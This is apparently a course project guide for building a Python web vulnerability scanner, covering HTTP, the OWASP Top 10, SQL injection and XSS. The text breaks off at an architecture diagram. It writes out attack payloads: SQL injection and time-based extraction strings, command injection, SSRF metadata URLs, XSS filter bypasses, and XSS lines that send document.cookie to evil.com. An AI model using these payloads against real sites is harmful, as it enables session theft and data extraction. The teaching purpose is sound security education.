Project 2: Web Application Vulnerability Scanner

Project 2: Web Application Vulnerability Scanner

Project Overview

Attribute Value
Difficulty Intermediate
Time Estimate 2-3 weeks
Programming Language Python
Primary Framework OWASP Top 10
Main Book โ€œBug Bounty Bootcampโ€ by Vickie Li
Knowledge Area Web Security

Learning Objectives

By completing this project, you will:

  1. Master the OWASP Top 10 - Understand each vulnerability class deeply enough to detect and exploit them
  2. Understand HTTP at the protocol level - Request/response headers, cookies, sessions, and state management
  3. Build automated security testing - Design scanners that find real vulnerabilities
  4. Learn attack surface discovery - Crawl applications to identify all input points
  5. Develop responsible disclosure skills - Report findings professionally with evidence

The Core Question

โ€œHow do web application scanners automatically find vulnerabilities that developers miss?โ€

Web applications are the #1 attack surface in modern organizations. Building your own scanner teaches you:

  • Why certain coding patterns create vulnerabilities
  • How injection attacks actually work at the request/response level
  • What makes false positives vs true positives
  • The difference between automated scanning and skilled testing

Deep Theoretical Foundation

The HTTP Protocol: Your Attack Surface

Every web vulnerability exploitation involves HTTP requests and responses. You must understand this protocol intimately:

HTTP REQUEST ANATOMY
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

POST /login HTTP/1.1                           โ—„โ”€โ”€ Request Line
Host: vulnerable-app.com                       โ—„โ”€โ”€ Headers begin
User-Agent: Mozilla/5.0 (Windows NT 10.0)
Accept: text/html,application/xhtml+xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Cookie: session=abc123; tracking=xyz789       โ—„โ”€โ”€ Cookies (session state)
Connection: close
                                               โ—„โ”€โ”€ Blank line separates headers/body
username=admin&password=secret123              โ—„โ”€โ”€ Request Body (POST data)


HTTP RESPONSE ANATOMY
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

HTTP/1.1 200 OK                                โ—„โ”€โ”€ Status Line
Date: Mon, 27 Dec 2025 12:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)                 โ—„โ”€โ”€ Information disclosure!
X-Powered-By: PHP/7.4.3                        โ—„โ”€โ”€ More info disclosure!
Set-Cookie: session=def456; HttpOnly; Secure   โ—„โ”€โ”€ New session cookie
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
                                               โ—„โ”€โ”€ Blank line
<!DOCTYPE html>                                โ—„โ”€โ”€ Response Body
<html>
<head><title>Welcome Admin</title></head>      โ—„โ”€โ”€ May reveal successful login
<body>...

Where Vulnerabilities Live

Web applications have multiple layers, each with unique attack surfaces:

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                    WEB APPLICATION STACK                             โ”‚
โ”‚                  (Attack Surface at Every Layer)                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

CLIENT SIDE (Browser)
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                                                                     โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”    โ”‚
โ”‚  โ”‚   JavaScript    โ”‚  โ”‚  Local Storage  โ”‚  โ”‚    Cookies      โ”‚    โ”‚
โ”‚  โ”‚                 โ”‚  โ”‚                 โ”‚  โ”‚                 โ”‚    โ”‚
โ”‚  โ”‚ โ— XSS attacks   โ”‚  โ”‚ โ— Sensitive     โ”‚  โ”‚ โ— Session       โ”‚    โ”‚
โ”‚  โ”‚   execute here  โ”‚  โ”‚   data exposure โ”‚  โ”‚   hijacking     โ”‚    โ”‚
โ”‚  โ”‚ โ— DOM           โ”‚  โ”‚ โ— No HttpOnly   โ”‚  โ”‚ โ— CSRF tokens   โ”‚    โ”‚
โ”‚  โ”‚   manipulation  โ”‚  โ”‚   protection    โ”‚  โ”‚ โ— Missing       โ”‚    โ”‚
โ”‚  โ”‚                 โ”‚  โ”‚                 โ”‚  โ”‚   Secure flag   โ”‚    โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜    โ”‚
โ”‚                                                                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                              โ”‚
                              โ”‚  HTTP Request
                              โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  WEB SERVER (nginx, Apache, IIS)                                    โ”‚
โ”‚                                                                     โ”‚
โ”‚  โ— Security headers (CSP, X-Frame-Options)                          โ”‚
โ”‚  โ— TLS configuration (HTTPS)                                        โ”‚
โ”‚  โ— Directory listings                                               โ”‚
โ”‚  โ— Server version disclosure                                        โ”‚
โ”‚                                                                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                              โ”‚
                              โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  APPLICATION LAYER (PHP, Python, Node.js, Java)                     โ”‚
โ”‚                                                                     โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”   โ”‚
โ”‚  โ”‚                    INPUT HANDLING                             โ”‚   โ”‚
โ”‚  โ”‚                                                               โ”‚   โ”‚
โ”‚  โ”‚  URL Parameters:  /page?id=1        โ† SQL Injection           โ”‚   โ”‚
โ”‚  โ”‚  POST Data:       username=admin    โ† Auth Bypass             โ”‚   โ”‚
โ”‚  โ”‚  Headers:         User-Agent: ...   โ† Log Injection           โ”‚   โ”‚
โ”‚  โ”‚  Cookies:         role=user         โ† Privilege Escalation    โ”‚   โ”‚
โ”‚  โ”‚  File Uploads:    image.php.jpg     โ† Remote Code Execution   โ”‚   โ”‚
โ”‚  โ”‚  JSON/XML:        {"user":"..."}    โ† XXE, Deserialization    โ”‚   โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜   โ”‚
โ”‚                                                                     โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”   โ”‚
โ”‚  โ”‚                    BUSINESS LOGIC                             โ”‚   โ”‚
โ”‚  โ”‚                                                               โ”‚   โ”‚
โ”‚  โ”‚  โ— IDOR (Insecure Direct Object Reference)                   โ”‚   โ”‚
โ”‚  โ”‚    GET /api/users/123 โ†’ Change to /api/users/124             โ”‚   โ”‚
โ”‚  โ”‚                                                               โ”‚   โ”‚
โ”‚  โ”‚  โ— Authorization flaws                                        โ”‚   โ”‚
โ”‚  โ”‚    User can access admin functions                           โ”‚   โ”‚
โ”‚  โ”‚                                                               โ”‚   โ”‚
โ”‚  โ”‚  โ— Race conditions                                            โ”‚   โ”‚
โ”‚  โ”‚    Submit payment twice quickly                              โ”‚   โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜   โ”‚
โ”‚                                                                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                              โ”‚
                              โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  DATABASE LAYER                                                     โ”‚
โ”‚                                                                     โ”‚
โ”‚  โ— SQL Injection (SELECT * FROM users WHERE id='$input')           โ”‚
โ”‚  โ— NoSQL Injection (MongoDB query operators)                        โ”‚
โ”‚  โ— Stored XSS (malicious data in database)                         โ”‚
โ”‚  โ— Credential exposure (passwords in plaintext)                     โ”‚
โ”‚                                                                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Web Application Stack - Attack Surface at Every Layer

OWASP Top 10 2025: What Your Scanner Must Find

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚              OWASP TOP 10 2025 VULNERABILITY CLASSES               โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

[A01] BROKEN ACCESS CONTROL
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Users can access resources they shouldn't
How to test:
  1. Change ?user_id=123 to ?user_id=124
  2. Access /admin without admin role
  3. Modify hidden form fields (role=admin)
  4. Bypass authentication via direct URL

Scanner Detection:
  โ”œโ”€โ”€ Test IDOR by incrementing/decrementing IDs
  โ”œโ”€โ”€ Access restricted paths without authentication
  โ””โ”€โ”€ Modify request parameters and observe response changes


[A02] CRYPTOGRAPHIC FAILURES
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Sensitive data exposed due to weak/missing encryption
How to test:
  1. Check for HTTP (not HTTPS)
  2. Analyze password storage (MD5, plaintext visible)
  3. Look for sensitive data in responses

Scanner Detection:
  โ”œโ”€โ”€ Flag any non-HTTPS login pages
  โ”œโ”€โ”€ Check for password/credit card in response bodies
  โ””โ”€โ”€ Analyze Set-Cookie for missing Secure flag


[A03] INJECTION (SQL, Command, LDAP)
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Untrusted data sent to interpreter as part of command
How to test:
  1. Add ' to inputs, look for SQL errors
  2. Try SQL payloads: ' OR '1'='1
  3. Test for command injection: ; ls -la
  4. LDAP injection: )(uid=*)

Scanner Detection:
  โ”œโ”€โ”€ Inject ' and " in all parameters
  โ”œโ”€โ”€ Analyze error messages for SQL syntax errors
  โ”œโ”€โ”€ Use time-based payloads: ' AND SLEEP(5)--
  โ””โ”€โ”€ Look for command output in responses


[A04] INSECURE DESIGN
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Missing security controls, flawed architecture
How to test:
  1. Check for rate limiting (brute force possible?)
  2. Review password reset flow
  3. Look for missing CAPTCHA

Scanner Detection:
  โ”œโ”€โ”€ Send 100 requests rapidly, check for rate limiting
  โ”œโ”€โ”€ Test password reset token predictability
  โ””โ”€โ”€ Note: Many design flaws need manual review


[A05] SECURITY MISCONFIGURATION
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Insecure default configs, unnecessary features
How to test:
  1. Check for default credentials
  2. Look for exposed admin interfaces
  3. Directory listing enabled?
  4. Stack traces in errors?

Scanner Detection:
  โ”œโ”€โ”€ Access /admin, /phpmyadmin, /wp-admin
  โ”œโ”€โ”€ Trigger errors, check for verbose messages
  โ”œโ”€โ”€ Test for directory listing: /images/
  โ””โ”€โ”€ Check common default credentials


[A06] VULNERABLE COMPONENTS
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Using libraries with known CVEs
How to test:
  1. Identify framework/library versions
  2. Check against CVE databases
  3. Look for outdated JavaScript libraries

Scanner Detection:
  โ”œโ”€โ”€ Parse Server header for versions
  โ”œโ”€โ”€ Check JavaScript libraries against retire.js
  โ””โ”€โ”€ Identify framework from response patterns


[A07] AUTHENTICATION FAILURES
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Broken login, session management
How to test:
  1. Brute force with common passwords
  2. Session fixation attacks
  3. Session timeout (do sessions expire?)

Scanner Detection:
  โ”œโ”€โ”€ Try admin:admin, admin:password
  โ”œโ”€โ”€ Check if session ID changes after login
  โ”œโ”€โ”€ Look for session ID in URL (bad practice)
  โ””โ”€โ”€ Test remember-me token security


[A08] DATA INTEGRITY FAILURES
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Software updates without verification
How to test:
  1. Check for unsigned updates
  2. Look for insecure deserialization

Scanner Detection:
  โ”œโ”€โ”€ Limited automated testing
  โ””โ”€โ”€ Flag if application loads external resources


[A09] LOGGING/MONITORING FAILURES
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Attacks go undetected
How to test:
  1. Trigger suspicious activity
  2. Check if you're blocked after failed logins

Scanner Detection:
  โ”œโ”€โ”€ Multiple failed logins - are you blocked?
  โ””โ”€โ”€ Note: Primarily manual review


[A10] SSRF (Server-Side Request Forgery)
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
What: Server makes requests to attacker-controlled destinations
How to test:
  1. Find URL input parameters
  2. Try ?url=http://169.254.169.254 (AWS metadata)
  3. Try ?url=http://localhost:8080

Scanner Detection:
  โ”œโ”€โ”€ Inject URLs pointing to known callback server
  โ”œโ”€โ”€ Try cloud metadata URLs
  โ””โ”€โ”€ Test for internal port scanning via SSRF

SQL Injection Deep Dive

SQL injection remains prevalent because itโ€™s easy to make and hard to detect automatically:

NORMAL LOGIN QUERY
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

User Input:
  username: alice
  password: secret123

Application Code (VULNERABLE):
  query = "SELECT * FROM users WHERE username='" + username +
          "' AND password='" + password + "'"

Resulting Query:
  SELECT * FROM users WHERE username='alice' AND password='secret123'

Result: Only returns Alice's record if password matches


SQL INJECTION ATTACK
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

User Input:
  username: admin' --
  password: anything

Resulting Query:
  SELECT * FROM users WHERE username='admin' --' AND password='anything'
                                             โ†‘
                                    This is a SQL comment!
                                    Everything after is ignored

Actual Query Executed:
  SELECT * FROM users WHERE username='admin'

Result: Returns admin account WITHOUT password check!


UNION-BASED DATA EXTRACTION
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

URL: /products?id=5

Normal Query:
  SELECT name, price, description FROM products WHERE id=5

Attack URL: /products?id=5 UNION SELECT username,password,email FROM users--

Resulting Query:
  SELECT name, price, description FROM products WHERE id=5
  UNION
  SELECT username, password, email FROM users--

Result: Page displays ALL usernames, passwords, and emails!


TIME-BASED BLIND SQL INJECTION
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

When no visible output exists, measure response time:

Attack: /products?id=5' AND SLEEP(5)--

If the page takes 5+ seconds to load:
  โ†’ SQL injection confirmed!
  โ†’ Database is processing the SLEEP() command

Extracting data character by character:
  /products?id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--

  If response takes 5 seconds โ†’ First char of database name is 'a'
  If response is instant โ†’ First char is NOT 'a', try 'b', 'c', etc.

Cross-Site Scripting (XSS) Explained

XSS ATTACK TYPES
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

REFLECTED XSS (Non-Persistent)
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
Attack URL sent to victim via phishing:
  https://vulnerable.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>

Server reflects input in response:
  <h1>Search results for: <script>document.location='...'</script></h1>

Browser executes the script โ†’ Cookies stolen!


STORED XSS (Persistent)
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
Attacker posts comment:
  Great product! <script>document.location='https://evil.com/steal?c='+document.cookie</script>

Comment saved in database, displayed to ALL users who view page
Every visitor's cookies are stolen automatically


DOM-BASED XSS
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
Vulnerable JavaScript:
  document.getElementById('output').innerHTML = location.hash.substring(1);

Attack URL:
  https://vulnerable.com/page#<img src=x onerror=alert(document.cookie)>

Script never goes to server - executes entirely client-side


XSS PAYLOADS FOR TESTING
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

Basic:
  <script>alert('XSS')</script>

Event handlers:
  <img src=x onerror=alert('XSS')>
  <body onload=alert('XSS')>
  <svg onload=alert('XSS')>

Filter bypasses:
  <ScRiPt>alert('XSS')</ScRiPt>                    # Case variation
  <script>alert(String.fromCharCode(88,83,83))</script>  # Char codes
  <img src=x onerror="&#97;lert('XSS')">           # HTML entities
  <script>eval(atob('YWxlcnQoJ1hTUycp'))</script>  # Base64

Context-aware:
  In attribute: " onmouseover="alert('XSS')
  In JavaScript: ';alert('XSS');//
  In URL: javascript:alert('XSS')

Project Specification

What Youโ€™re Building

A modular web vulnerability scanner with the following structure:

web-vuln-scanner/
โ”œโ”€โ”€ scanner.py              # Main scanner orchestrator
โ”œโ”€โ”€ crawler.py              # Web crawler for attack surface discovery
โ”œโ”€โ”€ modules/
โ”‚   โ”œโ”€โ”€ __init__.py
โ”‚   โ”œโ”€โ”€ sqli.py            # SQL injection tests
โ”‚   โ”œโ”€โ”€ xss.py             # XSS tests
โ”‚   โ”œโ”€โ”€ idor.py            # IDOR/access control tests
โ”‚   โ”œโ”€โ”€ ssrf.py            # SSRF tests
โ”‚   โ”œโ”€โ”€ headers.py         # Security headers analysis
โ”‚   โ””โ”€โ”€ disclosure.py      # Information disclosure tests
โ”œโ”€โ”€ payloads/
โ”‚   โ”œโ”€โ”€ sqli.txt           # SQL injection payloads
โ”‚   โ”œโ”€โ”€ xss.txt            # XSS payloads
โ”‚   โ””โ”€โ”€ wordlists/         # Directory brute-force lists
โ”œโ”€โ”€ reports/
โ”‚   โ””โ”€โ”€ templates/
โ”‚       โ””โ”€โ”€ report.html    # HTML report template
โ”œโ”€โ”€ requirements.txt
โ””โ”€โ”€ README.md

Functional Requirements

1. Web Crawler (crawler.py)

Must implement:

  • Start from seed URL, discover all pages
  • Extract forms (action URL, method, input fields)
  • Extract links (href, src)
  • Respect robots.txt (optional override)
  • Handle relative and absolute URLs
  • Track visited URLs to avoid loops

Should implement:

  • JavaScript rendering (Selenium/Playwright)
  • API endpoint discovery
  • Handle authentication (cookie jar)
  • Rate limiting

Output: List of pages with their forms and parameters

2. SQL Injection Scanner (modules/sqli.py)

Must implement:

  • Error-based detection (look for SQL errors in response)
  • Boolean-based detection (compare true/false responses)
  • Time-based detection (measure response delays)
  • Test all parameter types (GET, POST, cookies)

Should implement:

  • UNION-based exploitation
  • Identify database type (MySQL, PostgreSQL, MSSQL)
  • Extract table names
  • Payload encoding for WAF bypass

3. XSS Scanner (modules/xss.py)

Must implement:

  • Reflected XSS detection
  • Multiple context detection (HTML, attribute, JavaScript)
  • Basic filter bypass payloads

Should implement:

  • Stored XSS detection (check if payload persists)
  • DOM-based XSS detection
  • Custom payload generation based on context

4. IDOR Scanner (modules/idor.py)

Must implement:

  • Detect numeric ID parameters
  • Test ID manipulation (increment/decrement)
  • Compare responses for different IDs

Should implement:

  • UUID/GUID manipulation
  • Test with different user sessions

5. Security Headers Analyzer (modules/headers.py)

Must check for:

  • Content-Security-Policy
  • X-Content-Type-Options
  • X-Frame-Options
  • Strict-Transport-Security
  • X-XSS-Protection
  • Server/X-Powered-By disclosure

6. Report Generator

Must implement:

  • JSON output for tool integration
  • HTML report with findings, evidence, recommendations
  • Severity ratings (Critical, High, Medium, Low)
  • Screenshots/evidence storage

Solution Architecture

Component Design

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
